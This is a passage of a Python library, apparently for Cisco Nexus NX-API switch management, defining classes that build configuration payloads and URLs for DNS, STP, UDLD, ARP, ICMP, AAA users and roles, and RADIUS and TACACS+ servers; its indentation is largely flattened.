(RunningToStartUp._get_lsub()))
def get_json(self):
return {self.obj_name: {'attributes': self._get_att()}}
class Copy(BaseNXObject):
"""
This class defines copy command of Nexus switch
"""
def __init__(self):
self.obj_name = 'actionLSubj'
super(Copy, self).__init__(name="")
self.run_to_start = None
def get_url(self):
return '/api/mo/sys/action.json'
def add(self, command):
if isinstance(command, RunningToStartUp):
self._children.append(command)
self.run_to_start = command
else:
raise TypeError('Invalid command class')
def _get_attributes(self):
return {"dn": self._get_dn()}
def _get_dn(self):
return 'sys/action/' + RunningToStartUp._get_lsub()
def get_json(self):
return super(Copy, self).get_json(self.obj_name,
attributes=self._get_attributes())
@classmethod
def get(cls, session):
"""
Get information if copy command performed properly or not.
        :param session: Session instance used to communicate with the switch
:return Copy instance
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
query_url = '/api/mo/sys/action.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
        # status is initially unknown
descr = 'unknown'
copy = Copy()
for count in resp:
if count.get('actionLCont'):
act_children = count['actionLCont']['children']
for act_child in act_children:
if act_child.get('actionLSubj'):
children = act_child['actionLSubj']['children']
for child in children:
obj_name = 'topSystemCopyRSRslt'
if child.get(obj_name):
# Description contains copy status (Success)
descr = str(child[obj_name]
['attributes']['descr'])
run = RunningToStartUp(session=session, parent=copy)
run.set_status(descr)
copy.add(run)
return copy
class DnsVrf(BaseNXObject):
"""
This defines the Dns Vrf configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsVrf, self).__init__(name="")
self._session= session
self._parent = parent
self.name = name
self.object = 'dnsVrf'
self.profile = None
self.providers = []
self.domains = []
self.domain_exts = []
def set_profile(self, profile):
self.profile = profile
def use_in(self, obj=None):
self._children.append(obj)
if isinstance(obj, DnsProvider):
self.providers.append(obj)
elif isinstance(obj, DnsDom):
self.domains.append(obj)
elif isinstance(obj, DnsDomExt):
self.domain_exts.append(obj)
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsVrf, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
""" Return Dns VRF url """
if not self.profile:
return '/api/node/mo/sys/dns/prof-default.json'
else:
return '/api/node/mo/sys/dns/prof-%s.json'% self.profile
class DnsProvider(BaseNXObject):
"""
This defines the Dns Provider configuration
"""
def __init__(self, address, session=None, parent=None):
super(DnsProvider, self).__init__(name="")
self._session= session
self._parent = parent
self.address = address
self.object = 'dnsProvider'
def _get_attributes(self):
att = {}
if self.address:
att['addr'] = self.address
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsProvider, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsDom(BaseNXObject):
"""
This defines the Dns Domain name configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsDom, self).__init__(name="")
self._session= session
self._parent = parent
self.name = name
self.object = 'dnsDom'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsDom, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsDomExt(BaseNXObject):
"""
This defines the Dns domain list name configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsDomExt, self).__init__(name="")
self.name = name
self.object = 'dnsDomExt'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsDomExt, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsHost(BaseNXObject):
"""
This defines the Dns host configuration
"""
def __init__(self, name, address, session=None, parent=None):
super(DnsHost, self).__init__(name=name)
self._session= session
self._parent = parent
self.name = name
self.address = address
self.object = 'dnsHost'
self.child_v4 = 'dnsIpv4Host'
self.child_v6 = 'dnsIpv6Host'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def _get_children_attributes(self):
child = []
if self.address:
att = {'addr': self.address}
if '.' in self.address:
child.append({self.child_v4 : { "attributes" : att}})
if ':' in self.address:
child.append({self.child_v6 : { "attributes" : att}})
return child
def get_json(self):
"""
:returns: json response object
"""
return super(DnsHost, self).get_json(obj_class=self.object,
attributes=self._get_attributes(),
children=self._get_children_attributes())
class DnsProfile(BaseNXObject):
"""
This defines the Dns profile configuration
"""
def __init__(self, session=None, parent=None):
super(DnsProfile, self).__init__(name="")
self._session= session
self._parent = parent
self.object = "dnsProf"
self.name = "default"
self.providers = []
self.domains = []
self.domain_exts = []
self.hosts = []
self.vrfs = []
def set_prof_name(self, name):
self.name = name
def get_prof_name(self):
return self.name
def add(self, dns_obj=None):
self._children.append(dns_obj)
if isinstance(dns_obj, DnsProvider):
self.providers.append(dns_obj)
elif isinstance(dns_obj, DnsDom):
self.domains.append(dns_obj)
elif isinstance(dns_obj, DnsDomExt):
self.domain_exts.append(dns_obj)
elif isinstance(dns_obj, DnsHost):
self.hosts.append(dns_obj)
elif isinstance(dns_obj, DnsVrf):
self.vrfs.append(dns_obj)
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsProfile, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DNS(BaseNXObject):
"""
This defines the Dns Base Class
"""
def __init__(self, session=None, parent=None):
super(DNS, self).__init__(name="")
self._session= session
self._parent = parent
self.admin_st = None
self.object = "dnsEntity"
self.profiles = []
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def get_admin_st(self):
return self.admin_st
def enable_lookup(self):
self.admin_st = "enabled"
def disable(self, feature):
self.admin_st = "disabled"
def add_profile(self, dns_obj=None):
self._children.append(dns_obj)
self.profiles.append(dns_obj)
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DNS, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
""" Return Dns url """
return '/api/node/mo/sys/dns.json'
@classmethod
def _get_provider(cls, data, profile=None, vrf=None):
""" Returns the object by attaching provider object """
address = str(data['dnsProvider']['attributes']['addr'])
provider = DnsProvider(address)
if profile:
profile.add(provider)
return profile
if vrf:
vrf.use_in(provider)
return vrf
@classmethod
def _get_domain_ext(cls, data, profile=None, vrf=None):
""" Returns the object by attaching DNS domain_ext object """
name = str(data['dnsDomExt']['attributes']['name'])
dom_ext = DnsDomExt(name)
if profile:
profile.add(dom_ext)
return profile
if vrf:
vrf.use_in(dom_ext)
return vrf
@classmethod
def _get_domain(cls, data, profile=None, vrf=None):
""" Returns the object by attaching DNS domain object """
name = str(data['dnsDom']['attributes']['name'])
dom = DnsDom(name)
if profile:
profile.add(dom)
return profile
if vrf:
vrf.use_in(dom)
return vrf
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return Dns object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
obj = 'dnsEntity'
query_url = '/api/node/mo/sys/dns.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
            dns = DNS()
admin_st = ret[obj]['attributes']['adminSt']
dns.set_admin_st(admin_st)
if ret[obj].get('children'):
for child in ret[obj]['children']:
prof_name = str(child['dnsProf']['attributes']['name'])
dns_profile = DnsProfile()
dns_profile.set_prof_name(prof_name)
if child['dnsProf'].get('children'):
provider = child['dnsProf']['children']
for data in provider:
if data.get('dnsProvider'):
dns_profile = cls._get_provider(data,
profile=dns_profile)
elif data.get('dnsDomExt'):
dns_profile = cls._get_domain_ext(data,
profile=dns_profile)
elif data.get('dnsDom'):
                            dns_profile = cls._get_domain(data,
profile=dns_profile)
elif data.get('dnsHost'):
host_name = str(data['dnsHost']['attributes']
['name'])
for version in data['dnsHost']['children']:
if version.get('dnsIpv4Host'):
ipv4 = str(version['dnsIpv4Host']
['attributes']['addr'])
host = DnsHost(host_name, ipv4)
elif version.get('dnsIpv6Host'):
ipv6 = str(version['dnsIpv6Host']
['attributes']['addr'])
host = DnsHost(host_name, ipv6)
dns_profile.add(host)
elif data.get('dnsVrf'):
vrf_name = str(data['dnsVrf']['attributes']
['name'])
vrf = DnsVrf(vrf_name)
for obj in data['dnsVrf']['children']:
if obj.get('dnsProvider'):
vrf = cls._get_provider(obj, vrf=vrf)
elif obj.get('dnsDomExt'):
vrf = cls._get_domain_ext(obj,
vrf=vrf)
elif obj.get('dnsDom'):
vrf = cls._get_domain(obj, vrf=vrf)
dns_profile.add(vrf)
dns.add_profile(dns_profile)
return dns
class ICMP(BaseNXObject):
"""
This defines the Icmp configuration
"""
def __init__(self, version, interface, ctrl=None, session=None,
parent=None):
super(ICMP, self).__init__(name="")
self._session= session
self._parent = parent
if version not in ['v4', 'v6']:
            raise TypeError('IP version not supported')
self.version = 'icmp%sIf' % (version)
self.interface = interface
self.ctrl = ctrl
self.status = None
self.id = None
def _get_attributes(self):
att = {}
if self.ctrl in ['', 'redirect']:
att['ctrl'] = self.ctrl
return att
def get_json(self):
"""
:returns: json response object
"""
return super(ICMP, self).get_json(obj_class=self.version,
attributes=self._get_attributes())
def get_url(self):
""" Return Icmp url """
return ('/api/node/mo/sys/%s/inst/dom-default/if-[%s].json' %
(self.version.replace('If', ''), self.interface.if_name))
def _set_status(self, status):
self.status = status
def _set_id(self, id):
self.id = id
@classmethod
def _get(cls, session, query_url, version, icmps):
resp = session.get(query_url).json()['imdata']
if version == 'v4':
cls.version = 'icmpv4If'
elif version == 'v6':
cls.version = 'icmpv6If'
for ret in resp:
id = str(ret[cls.version]['attributes']['id'])
icmp = ICMP(version, id)
icmp._set_id(id)
if str(ret[cls.version]['attributes']['ctrl']) == 'redirect':
icmp._set_status('enabled')
else:
icmp._set_status('disabled')
icmp.version = cls.version[:6]
icmps.append(icmp)
@classmethod
def get(cls, session, version=None):
"""
:param session: Session object to communicate with Switch
:return list of icmp object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
icmps = []
if version == 'v4':
query_url = '/api/node/class/icmpv4If.json'
cls._get(session, query_url, version, icmps)
elif version == 'v6':
query_url = '/api/node/class/icmpv6If.json'
cls._get(session, query_url, version, icmps)
        elif version is None:
query_url1 = '/api/node/class/icmpv4If.json'
cls._get(session, query_url1, 'v4', icmps)
query_url2 = '/api/node/class/icmpv6If.json'
cls._get(session, query_url2, 'v6', icmps)
return icmps
class StpMst(BaseNXObject):
"""
This class defines STP Mst Entity configuration
"""
def __init__(self, session=None, parent=None):
super(StpMst, self).__init__(name="")
self._session= session
self._parent = parent
self.msten_obj = 'stpMstEntity'
self.simulate = None
self.hello_time = None
self.fwd_delay = None
self.max_age = None
def set_simulate(self, simulate):
self.simulate = simulate
def set_hello_time(self, hello_time):
''' Currently not able to configure '''
self.hello_time = hello_time
def set_fwd_delay(self, fwd_delay):
''' Currently not able to configure '''
self.fwd_delay = fwd_delay
def set_max_age(self, max_age):
''' Currently not able to configure '''
self.max_age = max_age
def _get_attributes(self):
att = {}
if self.simulate:
att['simulate'] = self.simulate
return att
def get_json(self):
return super(StpMst, self).get_json(obj_class=self.msten_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Mst Entity url """
return '/api/mo/sys/stp/inst/mstent.json'
class StpVlan(BaseNXObject):
"""
This class defines STP Vlan configuration
"""
def __init__(self, id, session=None, parent=None):
super(StpVlan, self).__init__(name="")
self._session= session
self._parent = parent
self.vlan_obj = 'stpVlan'
self.id = id
self.admin_st = None
self.bdg_priority = None
self.protocol = None
self.root_priority = None
self.root_addr = None
self.root_cost = None
self.root_port_no = None
self.bdg_addr = None
self.hello_time = None
self.fwd_delay = None
self.max_age = None
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def set_protocol(self, protocol):
''' Currently not able to configure '''
self.protocol = protocol
def set_root_pri(self, priority):
''' Currently not able to configure '''
self.root_priority = priority
def set_root_addr(self, address):
''' Currently not able to configure '''
self.root_addr = address
def set_root_cost(self, cost):
''' Currently not able to configure '''
self.root_cost = cost
def set_root_port_no(self, port_no):
''' Currently not able to configure '''
self.root_port_no = port_no
def set_bdg_addr(self, address):
''' Currently not able to configure '''
self.bdg_addr = address
def set_hello_time(self, hello_time):
''' Currently not able to configure '''
self.hello_time = hello_time
def set_fwd_delay(self, fwd_delay):
''' Currently not able to configure '''
self.fwd_delay = fwd_delay
def set_max_age(self, max_age):
''' Currently not able to configure '''
self.max_age = max_age
def _set_bdg_priority(self, priority):
self.bdg_priority = priority
def set_bdg_priority(self, priority):
        if int(priority) not in range(0, 61441):
            raise TypeError('Bridge priority must be in range <0-61440>')
        if int(priority) % 4096 != 0:
            raise TypeError('Bridge priority must be multiple of 4096')
self.bdg_priority = str(int(self.id) + int(priority))
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.admin_st == 'enabled':
att['bridgePriority'] = self.bdg_priority
return att
def get_json(self):
"""
:returns: json response object
"""
return super(StpVlan, self).get_json(obj_class=self.vlan_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Vlan url """
return '/api/mo/sys/stp/inst/vlan-%s.json'% self.id
class StpInterface(BaseNXObject):
"""
This class defines STP Interface configuration
"""
def __init__(self, id, session=None, parent=None):
super(StpInterface, self).__init__(name="")
self._session= session
self._parent = parent
self.if_obj = 'stpIf'
self.id = id
self.mode = 'default'
self.cost = None
self.priority = None
def set_mode(self, mode):
self.mode = mode
def set_cost(self, cost):
self.cost = cost
def set_priority(self, priority):
self.priority = priority
def _get_attributes(self):
att = {}
att['id'] = self.id.if_name
if self.mode:
att['mode'] = self.mode
return att
def get_json(self):
return super(StpInterface, self).get_json(obj_class=self.if_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Interface url """
return '/api/mo/sys/stp/inst/if-[%s].json'% self.id
class STP(BaseNXObject):
"""
This class defines STP configuration
"""
def __init__(self, session=None, parent=None):
super(STP, self).__init__(name="")
self._session= session
self._parent = parent
self.stp_obj = 'stpInst'
self.mode = None
self.port_type = 'normal'
self.msts = []
self.i_faces = []
self.vlans = []
def set_mode(self, mode):
self.mode = mode
def _set_port_type(self, port_type):
self.port_type = port_type
def add_port_type(self, port_type):
if port_type in ['bpdufilter', 'bpduguard']:
self.port_type += ',' + 'extchp-' + port_type[:4] + '-' + \
port_type[4:]
elif port_type == 'edge':
if "network" in self.port_type:
self.port_type = self.port_type.replace('network',
'extchp-edge')
else:
self.port_type += ',' + 'extchp-' + port_type[:4]
elif port_type == 'network':
if "edge" in self.port_type:
self.port_type = self.port_type.replace('extchp-edge',
'network')
else:
self.port_type += ',' + port_type
else:
raise TypeError("provide proper mode")
def add(self, stp_obj=None):
self._children.append(stp_obj)
if isinstance(stp_obj, StpMst):
self.msts.append(stp_obj)
if isinstance(stp_obj, StpInterface):
self.i_faces.append(stp_obj)
if isinstance(stp_obj, StpVlan):
self.vlans.append(stp_obj)
def _get_attributes(self):
att = {}
att['ctrl'] = self.port_type
if self.mode:
att['mode'] = self.mode
return att
def get_json(self):
return super(STP, self).get_json(obj_class=self.stp_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Interface url """
return '/api/mo/sys/stp/inst.json'
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
        :return STP object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
stp_obj = 'stpInst'
query_url = '/api/mo/sys/stp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
stp = STP()
mode = ret[stp_obj]['attributes']['mode']
port_type = ret[stp_obj]['attributes']['ctrl']
stp.set_mode(mode)
stp._set_port_type(port_type)
if ret[stp_obj].get('children'):
for child in ret[stp_obj]['children']:
if child.get('stpMstEntity'):
mst_att = child['stpMstEntity']['attributes']
stp_mst = StpMst()
stp_mst.set_simulate(str(mst_att['simulate']))
stp_mst.set_hello_time(str(mst_att['helloTime']))
stp_mst.set_fwd_delay(str(mst_att['fwdTime']))
stp_mst.set_max_age(str(mst_att['maxAge']))
stp.add(stp_mst)
elif child.get('stpVlan'):
vlan_att = child['stpVlan']['attributes']
stp_vlan = StpVlan(str(vlan_att['id']))
stp_vlan.set_admin_st(str(vlan_att['adminSt']))
stp_vlan.set_protocol(str(vlan_att['protocol']))
stp_vlan.set_root_pri(str(vlan_att['rootPriority']))
stp_vlan.set_root_addr(str(vlan_att['rootAddress']))
stp_vlan.set_root_cost(str(vlan_att['rootPathCost']))
stp_vlan.set_root_port_no(str(vlan_att['rootPort'
'Number']))
stp_vlan._set_bdg_priority(str(vlan_att['bridge'
'Priority']))
stp_vlan.set_bdg_addr(str(vlan_att['bridgeAddress']))
stp_vlan.set_hello_time(str(vlan_att['helloTime']))
stp_vlan.set_max_age(str(vlan_att['maxAge']))
stp_vlan.set_fwd_delay(str(vlan_att['fwdTime']))
stp.add(stp_vlan)
elif child.get('stpIf'):
int_att = child['stpIf']['attributes']
stp_i_face = StpInterface(str(int_att['id']))
stp_i_face.set_mode(str(int_att['mode']))
stp_i_face.set_cost(str(int_att['cost']))
stp_i_face.set_priority(str(int_att['priority']))
stp.add(stp_i_face)
return stp
class UDLD(BaseNXObject):
"""
This class defines UDLD configuration
"""
def __init__(self, session=None):
super(UDLD, self).__init__(name="")
self._session= session
self.udld_obj = 'udldInst'
self.udld_int_obj = 'udldPhysIf'
self.aggress = None
self.int_aggress = None
self.i_face = None
self.int_aggresses = []
self.i_faces = []
self.g_msg_int = None
def enable_aggress(self, i_face=None):
'''
        If i_face is not specified, enable aggressive mode globally;
        otherwise, enable aggressive mode on the given interface.
'''
if not i_face:
self.aggress = 'enabled'
else:
self.int_aggress = 'enabled'
self.i_face = i_face
def disable_aggress(self, i_face=None):
'''
        If i_face is not specified, disable aggressive mode globally;
        otherwise, disable aggressive mode on the given interface.
'''
if not i_face:
self.aggress = 'disabled'
else:
self.int_aggress = 'disabled'
self.i_face = i_face
def set_g_msg_int(self, msg_int):
self.g_msg_int = msg_int
def _get_attributes(self):
att = {}
if self.aggress:
att['aggressive'] = self.aggress
return att
def _get_child_attributes(self):
child = []
if self.int_aggress:
child.append({self.udld_int_obj:
{"attributes":
{'aggressive': self.int_aggress,
'id': self.i_face.if_name}}})
return child
def get_json(self):
return super(UDLD, self).get_json(obj_class=self.udld_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
def get_url(self):
""" Return Udld url """
return '/api/mo/sys/udld/inst.json'
def _get_interface_details(self, resp):
udld_int_obj = 'udldPhysIf'
udld_int_attr = resp[udld_int_obj]['attributes']
aggress = str(udld_int_attr['aggressive'])
id = str(udld_int_attr['id'])
self.int_aggresses.append(aggress)
self.i_faces.append(id)
@classmethod
def get(cls, session, interface=None):
"""
:param session: Session object to communicate with Switch
:return UDLD object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
udld_obj = 'udldInst'
udld = UDLD()
if interface:
            query_url = ('/api/mo/sys/udld/inst/physif-[%s].json?rsp-sub'
                         'tree=full' % interface)
resp = session.get(query_url).json()['imdata']
for ret in resp:
udld._get_interface_details(ret)
else:
query_url = '/api/mo/sys/udld/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
udld_att = ret[udld_obj]['attributes']
msg_int = str(udld_att['msgIntvl'])
udld.set_g_msg_int(msg_int)
aggress = str(udld_att['aggressive'])
if aggress == 'enabled':
udld.enable_aggress()
else:
udld.disable_aggress()
if ret[udld_obj].get('children'):
for child in ret[udld_obj]['children']:
udld._get_interface_details(child)
return udld
class ARP(BaseNXObject):
"""
This class defines ARP configuration
"""
def __init__(self, session=None):
super(ARP, self).__init__(name="")
self._session= session
self.arp_obj = 'arpInst'
self.timeout = '1500'
def set_timeout(self, time):
self.timeout = time
def _get_attributes(self):
att = {}
att['timeout'] = self.timeout
return att
def get_json(self):
return super(ARP, self).get_json(obj_class=self.arp_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Arp url """
return '/api/mo/sys/arp/inst.json'
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return ARP object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
arp_obj = 'arpInst'
arp = ARP()
query_url = '/api/mo/sys/arp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
arp_att = ret[arp_obj]['attributes']
arp.set_timeout(str(arp_att['timeout']))
return arp
class AaaRole(BaseNXObject):
"""
This class defines Role Creation
"""
def __init__(self, name, session=None):
super(AaaRole, self).__init__(name)
self.role_obj = 'aaaRole'
self.name = name
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_delete_url(self, name):
""" Return Delete Role url """
return '/api/node/mo/sys/userext/role-'+ name +'.json'
def get_url(self):
""" Return Role url """
return '/api/node/mo/sys/userext/role-'+ self.name +'.json'
def get_json(self):
return super(AaaRole, self).get_json(obj_class=self.role_obj,
attributes=self._get_attributes())
class AaaUserRole(BaseNXObject):
"""
This class defines User Role configuration
"""
def __init__(self, name, user_role, session=None):
super(AaaUserRole, self).__init__(name)
self._session= session
self.role_obj = 'aaaUserRole'
self.domain_obj = 'aaaUserDomain'
self.user_role = user_role
self.name = name
def _get_child_attributes(self):
child = []
child.append({self.role_obj: {"attributes":
{"name": self.user_role}}})
return child
def _get_attributes(self):
att = {}
att['name'] = 'all'
att['dn'] = 'sys/userext/user-' + self.name + '/userdomain-all'
return att
def get_delete_url(self, user_name, role):
""" Return Delete User Role url """
return ('/api/node/mo/sys/userext/user-' + user_name + '/userdomain-'
'all/role-' + role + '.json')
def get_url(self):
""" Return User Role url """
return ('/api/node/mo/sys/userext/user-' + self.name + '/userdomain-'
'all/role-' + self.user_role + '.json')
def get_json(self):
return super(AaaUserRole, self).get_json(obj_class=self.domain_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
class AaaUser(BaseNXObject):
"""
This class defines User configuration
"""
    def __init__(self, name, password=None, role='network-operator',
ssh_key=None, session=None, parent=None):
super(AaaUser, self).__init__(name)
self._session= session
self._parent = parent
self.user_obj = 'aaaUser'
self.name = name
if password:
self.password = password
self.ssh_key = ssh_key
self._set_role(role)
self.user_roles = []
def _set_role(self, role):
user_role = AaaUserRole(self.name, role)
self._children.append(user_role)
def set_role(self, role):
self.role = role
self.user_roles.append(role)
def set_ssh_key(self, key):
self.ssh_key = key
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.password:
att['pwd'] = self.password
att['pwdSet'] = 'yes'
else:
att['pwdSet'] = 'no'
return att
def _get_child_attributes(self):
child = []
if self.ssh_key:
ssh = {"aaaSshAuth": {"attributes": {'data': self.ssh_key}}}
child.append(ssh)
return child
def get_url(self):
""" Return User url """
return '/api/node/mo/sys/userext/user-' + self.name + '.json'
def get_json(self):
return super(AaaUser, self).get_json(obj_class=self.user_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
@classmethod
def get(cls, session, username):
"""
:param session: Session object to communicate with Switch
:return User object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
user_obj = 'aaaUser'
query_url = ('/api/node/mo/sys/userext/user-' + username +
'.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
user_att = ret[user_obj]['attributes']
user = AaaUser(str(user_att['name']))
children = ret[user_obj]['children']
for child in children:
if child.get('aaaUserDomain'):
for roles in child['aaaUserDomain']['children']:
user.set_role(str(roles['aaaUserRole']['attributes']
['name']))
elif child.get('aaaSshAuth'):
user.set_ssh_key(str(child['aaaSshAuth']['attributes']
['data']))
return user
class AaaRadiusProvider(BaseNXObject):
"""
This class defines Radius-server host configuration
"""
def __init__(self, name, key=None, key_enc=None, retries=None,
timeout=None, session=None, parent=None):
super(AaaRadiusProvider, self).__init__(name)
self._session= session
self._parent = parent
self.rad_prov_obj = 'aaaRadiusProvider'
self.name = name
self.key = key
self.key_enc = key_enc
self.retries = retries
self.timeout = timeout
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.timeout:
att['timeout'] = self.timeout
if self.retries:
att['retries'] = self.retries
return att
def get_delete_url(self, host_name):
""" Return Delete Radius-server host url """
return ('/api/node/mo/sys/userext/radiusext/radiusprovider-' +
host_name + '.json')
def get_url(self):
""" Return Radius-server host url """
return ('/api/node/mo/sys/userext/radiusext/radiusprovider-' +
self.name + '.json')
def get_json(self):
return super(AaaRadiusProvider, self).get_json(
obj_class=self.rad_prov_obj,
attributes=self._get_attributes())
class AaaRadius(BaseNXObject):
"""
This class defines Radius-server configuration
"""
def __init__(self, session=None, parent=None):
super(AaaRadius, self).__init__(name="")
self._session= session
self._parent = parent
self.radius_obj = 'aaaRadiusEp'
self.retries = None
self.timeout = None
self.src_int = None
self.key = None
self.key_enc = None
self.servers = []
def set_retries(self, retries):
self.retries = retries
def set_timeout(self, timeout):
self.timeout = timeout
def set_key(self, key, key_enc=None):
self.key = key
if key_enc:
self.key_enc = key_enc
def set_src_interface(self, src_int):
self.src_int = src_int
def add_host(self, name, key=None, key_enc=None, retries=None,
timeout=None):
host = AaaRadiusProvider(name, key, key_enc, retries, timeout)
self._children.append(host)
self.servers.append(host)
def _get_attributes(self):
att = {}
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.src_int:
att['srcIf'] = self.src_int
if self.timeout:
att['timeout'] = self.timeout
if self.retries:
att['retries'] = self.retries
return att
def get_url(self):
""" Return Radius-server url """
return '/api/node/mo/sys/userext/radiusext.json'
def get_json(self):
return super(AaaRadius, self).get_json(obj_class=self.radius_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, host_name=None):
"""
:param session: Session object to communicate with Switch
:return Radius object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rad_obj = 'aaaRadiusEp'
rad_prov_obj = 'aaaRadiusProvider'
radius = AaaRadius()
if host_name:
query_url = ('/api/node/mo/sys/userext/radiusext/radiusprovider-'
+ host_name + '.json')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prov_att = ret[rad_prov_obj]['attributes']
radius.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
retries=str(prov_att['retries']))
else:
query_url = ('/api/node/mo/sys/userext/radiusext.json?rsp-subtree'
'=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rad_att = ret[rad_obj]['attributes']
radius.set_retries(str(rad_att['retries']))
radius.set_timeout(str(rad_att['timeout']))
radius.set_src_interface(str(rad_att['srcIf']))
children = ret[rad_obj]['children']
for g_child in children:
if g_child.get(rad_prov_obj):
prov_att = g_child[rad_prov_obj]['attributes']
radius.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
retries=str(prov_att['retries']))
return radius
class AaaTacacsProvider(BaseNXObject):
"""
This class defines Tacacs+ server host configuration
"""
def __init__(self, name, key=None, key_enc=None, port=None,
timeout=None, session=None, parent=None):
super(AaaTacacsProvider, self).__init__(name)
self._session= session
self._parent = parent
self.tac_prov_obj = 'aaaTacacsPlusProvider'
self.name = name
self.key = key
self.key_enc = key_enc
self.port = port
self.timeout = timeout
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.timeout:
att['timeout'] = self.timeout
if self.port:
att['port'] = self.port
return att
def get_delete_url(self, host_name):
""" Return Delete Tacacs+ server host url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovider-' +
host_name + '.json')
def get_url(self):
""" Return Tacacs+ server host url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovider-' +
self.name + '.json')
def get_json(self):
return super(AaaTacacsProvider, self).get_json(
obj_class=self.tac_prov_obj,
attributes=self._get_attributes())
class AaaProviderRef(BaseNXObject):
"""
This class defines Tacacs+ server group configuration
"""
def __init__(self, name, server, session=None):
super(AaaProviderRef, self).__init__(name)
self._session = session
self.prov_ref_obj = 'aaaProviderRef'
self.name = name
self.server = server
def _get_attributes(self):
att = {}
att['name'] = self.server
return att
def get_delete_url(self, group_name, server):
""" Return Delete Tacacs+ server group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ group_name + '/providerref-' + server + '.json')
def get_url(self):
""" Return Tacacs+ server group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ self.name + '/providerref-' + self.server + '.json')
def get_json(self):
return super(AaaProviderRef, self).get_json(
obj_class=self.prov_ref_obj,
attributes=self._get_attributes())
class AaaTacacsProviderGroup(BaseNXObject):
"""
This class defines Tacacs+ group configuration
"""
def __init__(self, name, vrf=None, deadtime=None, server=None,
session=None, parent=None):
super(AaaTacacsProviderGroup, self).__init__(name)
self._session= session
self._parent = parent
self.tac_prov_grp_obj = 'aaaTacacsPlusProviderGroup'
self.name = name
self.vrf = vrf
self.deadtime = deadtime
self.server = server
self.grp_servers = []
        if server:
            self._create_server_host(name, server)
def _create_server_host(self, grp_name, server):
ref = AaaProviderRef(grp_name, server)
self._children.append(ref)
self.grp_servers.append(ref)
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.vrf:
att['vrf'] = self.vrf
if self.deadtime:
att['deadtime'] = self.deadtime
return att
def get_delete_url(self, group_name):
""" Return Delete Tacacs+ group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ group_name + '.json')
def get_url(self):
""" Return Tacacs+ group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ self.name + '.json')
def get_json(self):
return super(AaaTacacsProviderGroup, self).get_json(
obj_class=self.tac_prov_grp_obj,
attributes=self._get_attributes())
class AaaTacacs(BaseNXObject):
"""
This class defines Tacacs+ server configuration
"""
def __init__(self, session=None, parent=None):
super(AaaTacacs, self).__init__(name="")
self._session= session
self._parent = parent
